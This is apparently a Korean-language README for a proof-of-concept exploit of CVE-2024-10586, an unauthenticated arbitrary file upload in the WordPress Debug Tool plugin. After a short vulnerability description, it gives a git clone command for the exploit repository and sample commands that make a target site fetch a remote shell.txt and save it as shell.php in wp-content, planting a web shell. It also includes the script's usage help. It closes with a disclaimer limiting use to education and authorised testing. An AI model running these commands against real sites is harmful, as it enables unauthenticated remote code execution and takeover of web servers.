
CVE-2024-10586을 대상으로 한 개념 증명 익스플로잇으로, WordPress Debug Tool 플러그인을 겨냥합니다. 인증되지 않은 POST 요청을 통해 원격 코드 실행으로 이어지는 임의 파일 업로드를 자동화합니다.
설명
WordPress용 Debug Tool 플러그인은 2.2 버전까지 모든 버전에서 dbt_pull_image() 함수에 대한 기능 검사 누락과 파일 유형 검증 부재로 인해 임의 파일 생성에 취약합니다.
이로 인해 인증되지 않은 공격자가 .php 파일과 같은 임의 파일을 생성하여 원격 코드 실행에 악용할 수 있습니다.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
다음 명령어로 스크립트를 실행합니다: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
이 스크립트는 교육 목적으로만 제공됩니다. 책임감 있게 사용하고, 소유하고 있거나 명시적 테스트 권한이 있는 시스템에서만 사용하십시오. 제작자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.